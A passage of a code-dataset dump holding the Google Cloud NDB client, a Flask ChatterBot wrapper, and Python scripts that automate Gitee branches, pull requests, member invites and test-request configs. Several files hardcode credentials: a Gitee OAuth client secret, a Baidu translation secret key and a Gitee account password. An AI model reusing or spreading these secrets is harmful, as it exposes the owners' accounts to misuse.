GOOGLE_CLOUD_PROJECT environment variable\n * Google App Engine application ID\n * Google Compute Engine project ID (from metadata server)\n_\n Arguments:\n project (Optional[str]): The project to use as default.\n\n Returns:\n Union([str, None]): Default project if it can be determined.\n \"\"\"\n if project is None:\n project = _get_gcd_project()\n\n if project is None:\n project = _helpers._determine_default_project(project=project)\n\n return project\n\n\nclass Client(google_client.ClientWithProject):\n \"\"\"An NDB client.\n\n Arguments:\n project (Optional[str]): The project to pass to proxied API methods. If\n not passed, falls back to the default inferred from the\n environment.\n namespace (Optional[str]): Namespace to pass to proxied API methods.\n credentials (Optional[:class:`~google.auth.credentials.Credentials`]):\n The OAuth2 Credentials to use for this client. If not passed, falls\n back to the default inferred from the environment.\n \"\"\"\n\n SCOPE = (\"https://www.googleapis.com/auth/datastore\",)\n \"\"\"The scopes required for authenticating as a Cloud Datastore consumer.\"\"\"\n\n secure = True\n \"\"\"Whether to use a secure connection for API calls.\"\"\"\n\n def __init__(self, project=None, namespace=None, credentials=None):\n super(Client, self).__init__(project=project, credentials=credentials)\n self.namespace = namespace\n self.host = os.environ.get(\n environment_vars.GCD_HOST, DATASTORE_API_HOST\n )\n\n @property\n def _http(self):\n \"\"\"Getter for object used for HTTP transport.\n\n Raises:\n NotImplementedError: Always, HTTP transport is not supported.\n \"\"\"\n raise NotImplementedError(\"HTTP transport is not supported.\")\n\n @staticmethod\n def _determine_default(project):\n \"\"\"Helper: override default project detection.\"\"\"\n return _determine_default_project(project)\n" }, { "alpha_fraction": 0.7023809552192688, "alphanum_fraction": 0.7120535969734192, "avg_line_length": 31.780487060546875, "blob_id": "d4e3eabc4ad720431bdc999c806d26317f652c58", "content_id": "89f4b4be90e362f74e18b137d11d3490a84eb128", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1344, "license_type": "permissive", "max_line_length": 83, "num_lines": 41, "path": "/ndb/src/google/cloud/ndb/_api.py", "repo_name": "yeaat/google-cloud-python", "src_encoding": "UTF-8", "text": "# Copyright 2018 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Functions that interact with Datastore backend.\"\"\"\n\nimport grpc\n\nfrom google.cloud import _helpers\nfrom google.cloud import _http\nfrom google.cloud.datastore_v1.proto import datastore_pb2_grpc\n\n\ndef stub(client):\n \"\"\"Get a stub for the `Google Datastore` API.\n\n Arguments:\n client (:class:`~client.Client`): An NDB client instance.\n\n Returns:\n :class:`~google.cloud.datastore_v1.proto.datastore_pb2_grpc.DatastoreStub`:\n The stub instance.\n \"\"\"\n if client.secure:\n channel = _helpers.make_secure_channel(\n client._credentials, _http.DEFAULT_USER_AGENT, client.host\n )\n else:\n channel = grpc.insecure_channel(client.host)\n stub = datastore_pb2_grpc.DatastoreStub(channel)\n return stub\n" } ]
2
karisurya77/Chatbot
https://github.com/karisurya77/Chatbot
cd7c13ad6080b4e6817508bca95b8ef439bfc257
8871da2ab7d14475706a515186ae5ba228017a91
f460ceb5f5950aecb66124336f49203957d14b1b
refs/heads/master
2020-04-07T20:09:52.064376
2018-11-22T10:03:08
2018-11-22T10:03:08
158,677,754
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5505107641220093, "alphanum_fraction": 0.5675368905067444, "avg_line_length": 21.236841201782227, "blob_id": "61c221466f0359de61fa5945610004d9d7f3f91a", "content_id": "c1a334df06b4753375fbc5312bc0cd5f26251cf4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 881, "license_type": "no_license", "max_line_length": 49, "num_lines": 38, "path": "/app.py", "repo_name": "karisurya77/Chatbot", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 18 11:04:09 2018\r\n\r\n@author: suryaprakash.rao\r\n\"\"\"\r\n\r\nfrom flask import Flask,request\r\n#from flask import make_response\r\n#from flask import jsonify\r\nfrom flask_json import FlaskJSON, as_json_p\r\nfrom Chattertest import bot1\r\n\r\napp = Flask(__name__)\r\njson = FlaskJSON(app)\r\napp.config['JSON_ADD_STATUS'] = False\r\napp.config['JSON_JSONP_OPTIONAL'] = False\r\n\r\nprint (app.app_context())\r\nwith app.app_context():\r\n ctx=app.app_context()\r\n ctx.push()\r\n \r\n @app.route(\"/\")\r\n def home():\r\n return (\"hi\")\r\n @app.route(\"/index\")\r\n \r\n @app.route('/login', methods=['GET', 'POST'])\r\n @as_json_p\r\n def login():\r\n qus=request.args.get('mydata') \r\n ans=bot1(str(qus))\r\n test=\"Bot :\" + \"=\"+ str(ans)\r\n return (test) \r\n\r\n if __name__ == \"__main__\":\r\n app.run(debug = True)" }, { "alpha_fraction": 0.7599999904632568, "alphanum_fraction": 0.7599999904632568, "avg_line_length": 11.5, "blob_id": "904b55fdb8202f87c7cd3f2b0947c695a0b44769", "content_id": "0ee0f3940b4a0fcb4b5930da0a81be392a01839a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 25, "license_type": "no_license", "max_line_length": 14, "num_lines": 2, "path": "/README.md", "repo_name": "karisurya77/Chatbot", "src_encoding": "UTF-8", "text": "# Chatbot\nML for ChatBot\n" }, { "alpha_fraction": 0.5864661931991577, "alphanum_fraction": 0.621553897857666, "avg_line_length": 17.549999237060547, "blob_id": "26c9523ef75f3b26480bcded43686a12bd08333c", "content_id": "61ae8160eed47002a68473af766e8857ae850240", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 399, "license_type": "no_license", "max_line_length": 84, "num_lines": 20, "path": "/Chattertest.py", "repo_name": "karisurya77/Chatbot", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 14 17:12:27 2018\r\n\r\n@author: suryaprakash.rao\r\n\"\"\"\r\n\r\nimport chatterbot\r\n#import string\r\n\r\n\r\nbot=chatterbot.ChatBot('ibot',trainer='chatterbot.trainers.ChatterBotCorpusTrainer')\r\nbot.train('chatterbot.corpus.english')\r\n\r\ndef bot1(qus):\r\n if qus=='N':\r\n ans=\"good Bye\"\r\n else:\r\n ans=bot.get_response(qus)\r\n return(ans)\r\n " } ]
3
Crazysiri/checkinTestManage
https://github.com/Crazysiri/checkinTestManage
98daa94a09ece575720a0cb3bf7746c028ec840c
69e77cf73055983a916e3de0d64dd61abcca26c7
4840357f6948d538c70b65fe9a34d602d30538c7
refs/heads/master
2020-05-30T19:36:28.620648
2019-06-06T06:31:35
2019-06-06T06:31:35
189,927,789
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5029252171516418, "alphanum_fraction": 0.5187432169914246, "avg_line_length": 25.517240524291992, "blob_id": "e49da4c1c925b6d8bc1110d6ebee70084dd8287b", "content_id": "913a5e33221a7265cef0a0dfeafe177461c0212c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9454, "license_type": "permissive", "max_line_length": 135, "num_lines": 348, "path": "/framework/requestLenz.py", "repo_name": "Crazysiri/checkinTestManage", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n#sudo pip install pyyaml\n#sudo pip install requests\n#pip install ruamel.yaml\n\nimport requests\n\nimport sys\nimport os\nimport getopt\nimport yaml\nimport time\n\n#此参数需要外部配置,授权获取token的,其中username password为 gitee账户密码\nrequest_config_username = ''\nrequest_config_password = ''\nrequest_config_clientid = '4af0cd03a89df6c632efe70fe90623d94b4ee1a385ec147e0ff6c2d16ff42ff4'\nrequest_config_clientsecret = 'f5211dc8261cf0c0d997eef6c8c3bce6adf65cab69a3d65d30cf32993c89161e'\n\nclass LenzRequest:\n \n token = ''\n owner = ''\n repo = ''\n \n def __init__(self,owner,repo):\n self.owner = owner\n self.repo = repo\n \n self.getToken()\n \n def getTokenInDisk(self):\n path = os.path.dirname(os.path.realpath(__file__))\n path = os.path.join(path,\"configs/token.yaml\")\n \n if not os.path.isfile(path):\n os.system(\"touch \" + path)\n f = open(path,'r')\n \n content = f.read()\n \n content_yaml = yaml.load(content)\n \n try:\n token = content_yaml['token']\n date = int(content_yaml['date'])\n except TypeError:\n token = ''\n date = 0\n \n current_date = int(time.time())\n \n #12小时\n if current_date - date > 60 * 60 *12:\n self.token = None\n else:\n self.token = token\n f.close()\n\n def saveTokenToDisk(self):\n\n path = os.path.dirname(os.path.realpath(__file__))\n path = os.path.join(path,\"configs/token.yaml\")\n \n f = open(path,'r')\n content = f.read()\n\n content_yaml = {}\n \n f = open(path,'w')\n current_date = int(time.time())\n content_yaml['token'] = self.token\n content_yaml['date'] = current_date\n\n yaml.dump(content_yaml, f)\n\n \n #获取 授权token\n def getToken(self):\n \n self.getTokenInDisk()\n \n if not self.token:\n \n post_headers = {\n \"Content-Type\":'application/x-www-form-urlencoded'\n }\n\n params = {\n \"grant_type\":\"password\",\n \"username\":request_config_username,\n \"password\":request_config_password,\n \"client_id\":request_config_clientid,\n \"client_secret\":request_config_clientsecret,\n# \"scope\":\"user_info projects pull_requests issues notes keys hook groups gists enterprises\"\n \"scope\":\"user_info projects pull_requests issues notes keys hook groups gists\"\n\n }\n\n url = \"https://gitee.com/oauth/token\"\n req = requests.post(url,params=params,headers=post_headers)\n result = req.json()\n print(str(result))\n self.token = result[\"access_token\"]\n self.saveTokenToDisk()\n\n#获取所有分支\n def getAllBranches(self):\n url = 'https://gitee.com/api/v5/repos/'+self.owner+'/'+self.repo+'/branches'\n \n post_headers = {\n \"Content-Type\":'application/x-www-form-urlencoded'\n }\n \n params = {\n \"access_token\":self.token,\n \"owner\":self.owner,\n \"repo\":self.repo,\n }\n \n req = requests.get(url,params=params,headers=post_headers)\n result = req.json()\n return result\n \n \n \n#创建新分支\n def createNewBranch(self,branch,branch_from):\n url = 'https://gitee.com/api/v5/repos/'+self.owner+'/'+self.repo+'/branches'\n\n post_headers = {\n \"Content-Type\":'application/x-www-form-urlencoded'\n }\n \n params = {\n \"access_token\":self.token,\n \"owner\":self.owner,\n \"repo\":self.repo,\n \"refs\":branch_from,\n \"branch_name\":branch\n }\n \n req = requests.post(url,params=params,headers=post_headers)\n result = req.json()\n return result\n\n \n \n \n \n#邀请 加入 某个库\n def inviteRepoMember(self,member,repo):\n url = 'https://gitee.com/api/v5/repos/'+self.owner+'/'+repo+'/collaborators/'+member\n \n post_headers = {\n \"Content-Type\":'application/json'\n }\n \n params = {\n \"access_token\":self.token,\n \"owner\":self.owner,\n \"repo\":repo,\n \"username\":member,\n \"permission\":\"push\"\n }\n \n \n result = requests.put(url,params=params,headers=post_headers)\n return result.json()\n\n\n def getAllPRS(self):\n url = 'https://gitee.com/api/v5/repos/'+self.owner+'/'+self.repo+'/pulls'\n\n post_headers = {\n \"Content-Type\":'application/json'\n }\n\n params = {\n \"access_token\":self.token,\n \"owner\":self.owner,\n \"repo\":self.repo,\n \"state\":\"open\",\n \"sort\":\"created\",\n \"direction\":\"desc\",\n \"page\":1,\n \"per_page\":20\n }\n\n req = requests.get(url,params=params,headers=post_headers)\n\n result = req.json()\n return result\n \n \n \n #获取pr提交记录\n def getPRCommits(self,number):\n url = 'https://gitee.com/api/v5/repos/%s/%s/pulls/%s/commits' % (self.owner,self.repo,number)\n\n post_headers = {\n \"Content-Type\":'application/json'\n }\n\n params = {\n \"access_token\":self.token,\n \"owner\":self.owner,\n \"repo\":self.repo,\n \"number\":number\n }\n\n req = requests.get(url,params=params,headers=post_headers)\n\n return req.json()\n \"\"\"\n {\n \"sha\": \"2a94be825ce1ea2cd8d22f2aa10fac23ba19167d\",\n \"filename\": \"LenzBusiness/App部分逻辑说明文档\",\n \"status\": null,\n \"additions\": \"82\",\n \"deletions\": \"25\",\n \"blob_url\": \"https://gitee.com/ppz_bj/LenzBusiness/blob/2a94be825ce1ea2cd8d22f2aa10fac23ba19167d/LenzBusiness/App部分逻辑说明文档\",\n \"raw_url\": \"https://gitee.com/ppz_bj/LenzBusiness/raw/2a94be825ce1ea2cd8d22f2aa10fac23ba19167d/LenzBusiness/App部分逻辑说明文档\",\n \"patch\": {\n \"diff\": \"\",\n \"new_path\": \"LenzBusiness/App部分逻辑说明文档\",\n \"old_path\": \"LenzBusiness/App部分逻辑说明文档\",\n \"a_mode\": \"100644\",\n \"b_mode\": \"100644\",\n \"new_file\": false,\n \"renamed_file\": false,\n \"deleted_file\": false,\n \"too_large\": false\n }\n }\n \"\"\"\n #获取pr diff\n def getPRDiffs(self,number):\n \n url = 'https://gitee.com/api/v5/repos/%s/%s/pulls/%s/files' % (self.owner,self.repo,number)\n\n post_headers = {\n \"Content-Type\":'application/json'\n }\n \n params = {\n \"access_token\":self.token,\n \"owner\":self.owner,\n \"repo\":self.repo,\n \"number\":number\n }\n\n req = requests.get(url,params=params,headers=post_headers)\n return req.json()\n\n\n #创建pr\n def createPR(self,branch,title):\n \n url = 'https://gitee.com/api/v5/repos/'+self.owner+'/'+self.repo+'/pulls'\n\n post_headers = {\n \"Content-Type\":'application/json'\n }\n\n params = {\n \"access_token\":self.token,\n \"title\":title,\n \"head\":branch,\n \"base\":\"master\"\n }\n\n\n req = requests.post(url,params=params,headers=post_headers)\n result = req.json()\n success = False\n number = 0\n try:\n id = result['id']\n number = result['number']\n success = True\n except KeyError:\n success = False\n print('createPR'+str(result))\n return success,number\n\n\n \n #返回所有的评论 和 pr url\n def getPRByAllProcesses(self,branch,title):\n \n #first creat pr\n success,number = self.createPR(branch,title)\n if not success:\n #second if created get pr number in listlist\n result = self.getAllPRS()\n\n for pr in result:\n number = pr[\"number\"]\n b = pr[\"head\"][\"ref\"]\n if branch == b:\n success = True\n break\n\n result = self.getPRCommits(number)\n \n list = []\n \n for commit in result:\n list.append(commit['commit']['message'])\n# print('message:'+commit['commit']['message'])\n pr_url = 'https://gitee.com/%s/%s/pulls/%s' %(self.owner,self.repo,number)\n return list,pr_url\n\n\n\nimport ruamel.yaml\nfrom ruamel.yaml.util import load_yaml_guess_indent\n\n\n\n\ndef main(argv):\n if sys.getdefaultencoding() != 'utf-8':\n reload(sys)\n sys.setdefaultencoding('utf-8')\n \n print ('\\n')\n\n branch_for_pr = \"feature/2019_05_14_吕博涧_时间打点\"\n\n title = \"pr:\" + branch_for_pr\n\n request = LenzRequest('ppz_bj','LenzBusiness')\n request.getPRByAllProcesses(branch_for_pr,title)\n\n #btcxiaowu,zhang_jack,Lenz_ydd\n# result = request.inviteRepoMember('zhang_jack','LenzPictureQuestionModule')\n\n# result = getAllPRS(token,\"LenzBusiness\")\n\n\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n\n\n" }, { "alpha_fraction": 0.5481637120246887, "alphanum_fraction": 0.5534102916717529, "avg_line_length": 23.689119338989258, "blob_id": "74dbe9e3aaf9d698016ae884165fadde4271b4a1", "content_id": "eb08b001da70599bd6450bb8908cd11f3895a2c9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5085, "license_type": "permissive", "max_line_length": 75, "num_lines": 193, "path": "/createProject.py", "repo_name": "Crazysiri/checkinTestManage", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n#import urllib.request\n#from urllib import request,parse\n# pip install ruamel.yaml\n\nimport sys\nimport os\nimport getopt\nimport time\nimport io\n\nimport git\nfrom git import Repo\n\nimport ruamel.yaml\nfrom ruamel.yaml.util import load_yaml_guess_indent\n\n\npath = os.path.dirname(os.path.realpath(__file__))\n\nsys.path.append(path+'/framework')\nfrom translate import translate_baidu\nsys.path.append(path+'/template')\nfrom templateManager import TemplateConfig\n\n#log = master.log()\n\n#currentCommit = repo.commit(currentBranch)\n#compareCommit = repo.commit(compareBranch)\n\n#diffed = repo.log(currentBranch,compareBranch)\n#print(currentCommit+currentCommit)\n\n\n#commits = list(repo.iter_commits(currentBranch))[:5]\n#for commit in commits:\n# print('author:%s email:%s' % (commit.author.name,commit.author.email))\n\ndef getGitBranchNameFromTaskName(taskName):\n\n content = translate_baidu(taskName)\n\n return handleTranslateStr(content)\n\n#首字母大写然后拼接\ndef handleTranslateStr(content):\n\n comps = content.split(' ')\n comps_new = []\n for com in comps:\n com = com.capitalize()\n comps_new.append(com)\n return ''.join(comps_new)\n\n\ndef create():\n if sys.getdefaultencoding() != 'utf-8':\n reload(sys)\n sys.setdefaultencoding('utf-8')\n \n path = os.path.dirname(os.path.realpath(__file__))\n path = os.path.join(path,'config.yaml')\n yamlContent,ind,bsi = load_yaml_guess_indent(open(path))\n \n \n print ('\\n')\n print ('\\n')\n # 'LenzBusiness' 'LenzMember'\n print('-----------------------------------')\n print('工程列表:')\n count = 0\n for p in yamlContent['project_list']:\n count += 1\n print(str(count)+'.'+p['prefix'])\n print('-----------------------------------')\n repo_index = int(raw_input('请输入工程名称索引:'))\n print('-----------------------------------')\n repo_name = yamlContent['project_list'][repo_index - 1]['repo_name']\n prefix = yamlContent['project_list'][repo_index - 1]['prefix']\n\n pm_name = ''\n task_name = ''\n\n print ('\\n')\n print('-----------------------------------')\n print('生成 feature/时间_任务名称')\n print('例子 feature/20190516_时间打点')\n print('-----------------------------------')\n print('-----------------------------------')\n print('pm列表:')\n count = 0\n for p in yamlContent['pm_list']:\n count += 1\n print(str(count)+'.'+p)\n pm_index = int(raw_input('请输入PM名字索引:'))\n pm_name = yamlContent['pm_list'][pm_index-1]\n print('-----------------------------------')\n\n \n print ('\\n')\n print('-----------------------------------')\n while task_name == '':\n task_name = raw_input('请输入任务名称(不要带空格):')\n print('-----------------------------------')\n\n\n taskName = getGitBranchNameFromTaskName(task_name)\n\n date_string = time.strftime(\"%Y%m%d\",time.localtime())\n\n just_test_branch = date_string + '_' + taskName #用作文件名\n\n test_branch = 'feature/' + date_string + '_' + taskName\n print ('\\n')\n print ('\\n')\n\n in_text = ''\n \n test_options = ''\n \n print('-----------------------------------')\n print('项目测试项:---------一行一个---------')\n print('相机优化 ')\n print('主任务列表优化 ')\n print('最后输入 q 回车 结束输入')\n print('-----------------------------------')\n print('请输入项目测试项:')\n\n count = 0\n\n while in_text != 'q':\n count += 1\n in_text = raw_input()\n if in_text != 'q':\n test_options += str(count) + '.' + in_text\n test_options += '\\n'\n print('-----------------------------------')\n\n print ('\\n')\n\n\n\n \n#git 打新分支 默认 feature/xxx\n\n repo = Repo('~/' + repo_name)\n master = repo.heads.master\n currentBranch = repo.head.reference\n if currentBranch != master:\n master.checkout()\n git = repo.git\n git.checkout('master',b=test_branch)\n\n print('切分支成功:')\n print(test_branch)\n\n#yaml文件更新\n\n config = TemplateConfig()\n config.readConfigFromTemplate()\n \n config.git_branch = test_branch\n config.git_project_name = repo_name\n config.test_options = test_options\n config.project_pm = pm_name\n config.project_name = prefix + ' ' + task_name\n\n yaml_name = just_test_branch+'_config.yaml'\n path = os.path.dirname(os.path.realpath(__file__))\n yamlPath = os.path.join(path,'configs/' + yaml_name)\n\n if not os.path.isfile(yamlPath):\n os.system(\"touch \" + yamlPath)\n\n path = os.path.dirname(os.path.realpath(__file__))\n with io.open(path+'/configs/configs','a',encoding='utf-8') as f:\n f.write(yaml_name)\n f.write(u'\\n')\n\n config.save(yamlPath)\n\n print('存储到本地配置成功:')\n print(test_options)\n\ndef main(argv):\n create()\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n\n#可优化:1.项目名称和产品通过配置文件 2.自动抓取上一次对应项目的模版\n" }, { "alpha_fraction": 0.35117772221565247, "alphanum_fraction": 0.35974302887916565, "avg_line_length": 27.303030014038086, "blob_id": "74384e66abf23ce402cc63dc0a0f0d80d5938859", "content_id": "a4f67435ac92969432345e3fbf576ed27d24faf4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1048, "license_type": "permissive", "max_line_length": 68, "num_lines": 33, "path": "/checkin.py.command", "repo_name": "Crazysiri/checkinTestManage", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport inviteMember\nimport createProject\nimport sendEmail\nimport sys\n\n\n\ndef main(argv):\n print('\\n')\n print('-------------------------------------------------------')\n print('-------------------------------------------------------')\n print(' 功能list ')\n print('-------------------------------------------------------')\n print('1.创建提测任务(master切分支,创建提测邮件一部分).')\n# print('\\n')\n print('2.发提测邮件(选提测任务)')\n# print('\\n')\n print('3.邀请人员进指定库(目前只有iOS的可以用)')\n print('-------------------------------------------------------')\n print('-------------------------------------------------------')\n type = int(raw_input('输入选择项:'))\n if type == 1:\n createProject.create()\n elif type == 2:\n sendEmail.send()\n elif type == 3:\n inviteMember.invite()\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n" }, { "alpha_fraction": 0.6098256707191467, "alphanum_fraction": 0.6110935211181641, "avg_line_length": 30.86868667602539, "blob_id": "4d03167a739d7c9acdda793c6c62467fd351478b", "content_id": "30c0f3b475568130363dd956d4b39cb68efbcb36", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3341, "license_type": "permissive", "max_line_length": 110, "num_lines": 99, "path": "/template/templateManager.py", "repo_name": "Crazysiri/checkinTestManage", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport ruamel.yaml\nfrom ruamel.yaml.util import load_yaml_guess_indent\n\nimport os\nimport sys\n\n\nclass TemplateConfig:\n \n yamlContent = None\n ind = None\n bsi = None\n \n project_name=\"\" #项目名称\n project_number=\"\" #项目标号\n git_project_name=\"\" #git工程\n git_branch=\"\" #提测分支\n self_is_test=\"\"\"是 / dev环境\"\"\" #研发是否自测\n test_options=\"\" #提测功能项\n review_members=\"\"#代码Review人员\n project_pm=\"\"#产品\n project_developers=\"\"#开发\n project_pr_diff=\"\"#提测内容pr\n project_ui=\"\"#ui人员\n poject_comment=\"\"#备注\n online_time=\"\"#预计上线时间\n \n #部署发布顺序\n #上线发布的分支\n #上线时间\n #测试报告\n \n def readConfig(self,path):\n yamlContent,ind,bsi = load_yaml_guess_indent(open(path.decode('utf-8')))\n \n self.git_project_name = yamlContent['git_project_name']\n self.project_name = yamlContent['project_name']\n self.git_branch = yamlContent['git_branch']\n self.test_options = yamlContent['test_options']\n self.review_members = yamlContent['review_members']\n self.project_pm = yamlContent['project_pm']\n self.project_developers = yamlContent['project_developers']\n self.poject_comment = yamlContent['poject_comment']\n self.project_ui = yamlContent['project_ui']\n self.project_pr_diff = yamlContent['project_pr_diff']\n \n self.yamlContent = yamlContent\n self.ind = ind\n self.bsi = bsi\n \n def readConfigFromTemplate(self):\n\n path = os.path.dirname(os.path.realpath(__file__))\n \n configs_path = os.path.join(path,'template.yaml')\n \n self.readConfig(configs_path)\n\n def save(self,path):\n \n self.yamlContent['git_project_name'] = self.git_project_name\n self.yamlContent['project_name'] = self.project_name\n self.yamlContent['git_branch'] = self.git_branch\n self.yamlContent['test_options'] = self.test_options\n self.yamlContent['review_members'] = self.review_members\n self.yamlContent['project_pm'] = self.project_pm\n self.yamlContent['project_developers'] = self.project_developers\n self.yamlContent['poject_comment'] = self.poject_comment\n self.yamlContent['project_ui'] = self.project_ui\n self.yamlContent['project_pr_diff'] = self.project_pr_diff\n ruamel.yaml.round_trip_dump(self.yamlContent,open(path,'w'),indent=self.ind,block_seq_indent=self.bsi)\n\n def log(self):\n print('项目名称:'+self.project_name)\n print('提测分支:'+self.git_branch)\n print('测试项:'+self.test_options)\n print('代码review人员:'+self.review_members)\n print('pm:'+self.project_pm)\n print('开发者:'+self.project_developers)\n print('备注:'+self.poject_comment)\n print('git工程:'+self.git_project_name)\n print('ui:'+self.project_ui)\n print('pr:'+self.project_pr_diff)\n\n\n\n\nif __name__ == \"__main__\":\n \n if sys.getdefaultencoding() != 'utf-8':\n reload(sys)\n sys.setdefaultencoding('utf-8')\n \n config = TemplateConfig()\n config.readConfigFromTemplate()\n config.log()\n" }, { "alpha_fraction": 0.5784832239151001, "alphanum_fraction": 0.6102292537689209, "avg_line_length": 22.625, "blob_id": "f573fc09236e215222c75c39b95db3641d99ac43", "content_id": "6cbf823be238036a403696ec12c205c2a6e79adc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1158, "license_type": "permissive", "max_line_length": 120, "num_lines": 48, "path": "/framework/translate.py", "repo_name": "Crazysiri/checkinTestManage", "src_encoding": "UTF-8", "text": "#/usr/bin/env python\n#coding=utf8\n \nimport httplib\nimport md5\nimport urllib\nimport random\nimport json\n\nappid = '20190601000303970' #你的appid\nsecretKey = 'nGFLJErsGa1OODBkOQ35' #你的密钥\n\n\ndef translate_baidu(content):\n\n httpClient = None\n myurl = '/api/trans/vip/translate'\n q = content\n fromLang = 'zh'\n toLang = 'en'\n salt = random.randint(32768, 65536)\n\n sign = appid+q+str(salt)+secretKey\n m1 = md5.new()\n m1.update(sign)\n sign = m1.hexdigest()\n myurl = myurl+'?appid='+appid+'&q='+urllib.quote(q)+'&from='+fromLang+'&to='+toLang+'&salt='+str(salt)+'&sign='+sign\n \n try:\n httpClient = httplib.HTTPConnection('api.fanyi.baidu.com')\n httpClient.request('GET', myurl)\n \n #response是HTTPResponse对象\n response = httpClient.getresponse()\n result = response.read().decode('utf-8')\n result = json.loads(result)\n return result['trans_result'][0]['dst']\n except Exception, e:\n print(e)\n return content\n finally:\n if httpClient:\n httpClient.close()\n\n\nif __name__ == \"__main__\":\n result = translate_baidu('5月优化')\n print(result)\n" }, { "alpha_fraction": 0.6547825932502747, "alphanum_fraction": 0.656521737575531, "avg_line_length": 22.4489803314209, "blob_id": "543319cff43ec0ad1064001008f0213631b600c6", "content_id": "05ee27857920ec1526362bce651bc66c785f9270", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1206, "license_type": "permissive", "max_line_length": 69, "num_lines": 49, "path": "/inviteMember.py", "repo_name": "Crazysiri/checkinTestManage", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport getopt\nimport sys\nimport os\n\npath = os.path.dirname(os.path.realpath(__file__))\npath = path+'/framework'\nsys.path.append(path)\nimport requestLenz\nfrom requestLenz import LenzRequest\n\nimport ruamel.yaml\nfrom ruamel.yaml.util import load_yaml_guess_indent\n\n#工程配置(git账户密码,邮箱账户密码等等)\nclass ProjectConfig:\n \n config = None\n \n def read(self):\n path = os.path.dirname(os.path.realpath(__file__))\n path = os.path.join(path,'config.yaml')\n yamlContent,ind,bsi = load_yaml_guess_indent(open(path))\n self.config = yamlContent\n\np_config = ProjectConfig()\np_config.read()\n\ndef invite():\n \n requestLenz.request_config_username = p_config.config['git_user']\n requestLenz.request_config_password = p_config.config['git_pass']\n \n request = LenzRequest('ppz_bj','')\n \n repo = raw_input('输入要邀请的项目(LenzBusiness):')\n members = ['btcxiaowu','zhang_jack','Lenz_ydd']\n for member in members:\n result = request.inviteRepoMember(member,repo)\n print(str(result))\n\n\ndef main(argv):\n invite()\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n\n" }, { "alpha_fraction": 0.6095890402793884, "alphanum_fraction": 0.6164383292198181, "avg_line_length": 21.901960372924805, "blob_id": "2d6b34e9add9538e9341a8f54c20fabded403648", "content_id": "3c601ff8b2793900661c48dfe22d9b98b6646680", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1216, "license_type": "permissive", "max_line_length": 70, "num_lines": 51, "path": "/createBranch.py.command", "repo_name": "Crazysiri/checkinTestManage", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport getopt\nimport sys\nimport os\nimport time\n\npath = os.path.dirname(os.path.realpath(__file__))\npath = path+'/framework'\nsys.path.append(path)\nimport requestLenz\nfrom requestLenz import LenzRequest\n\ndef create():\n if sys.getdefaultencoding() != 'utf-8':\n reload(sys)\n sys.setdefaultencoding('utf-8')\n requestLenz.request_config_username = '[email protected]'\n requestLenz.request_config_password = 'zxcv12'\n \n repo = ''\n type = int(raw_input('请输入要创建分支的工程(1-LenzBusiness 2-LenzMember):'))\n if type == 1:\n repo = 'LenzBusiness'\n elif type == 2:\n repo = 'LenzMember'\n\n input_branch = raw_input('输入要创建的分支:')\n\n request = LenzRequest('ppz_bj',repo)\n\n date_string = time.strftime(\"%Y%m%d\",time.localtime())\n\n branch = 'rtag/'+date_string+'_'+input_branch\n request.createNewBranch(branch,'master')\n\n json = request.getAllBranches()\n list = []\n for dict in json:\n list.append(dict['name'])\n\n for item in list:\n if item == branch:\n print('创建成功:'+item)\n\ndef main(argv):\n create()\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n" }, { "alpha_fraction": 0.7243402004241943, "alphanum_fraction": 0.7478005886077881, "avg_line_length": 23.35714340209961, "blob_id": "346bf6c7840c2cafbe3fb03eaab8083ef58a6020", "content_id": "5faf84ed8e05466301af7427d49c5c1aed25c2e0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 723, "license_type": "permissive", "max_line_length": 86, "num_lines": 14, "path": "/README.md", "repo_name": "Crazysiri/checkinTestManage", "src_encoding": "UTF-8", "text": "# checkinTestManage\n\n## 该python脚本 主要为了发提测邮件加速。\n### 功能list:\n### 1.创建提测项目:\n 1)切好本地分支\n 2)创建提测模版并填写一部分\n### 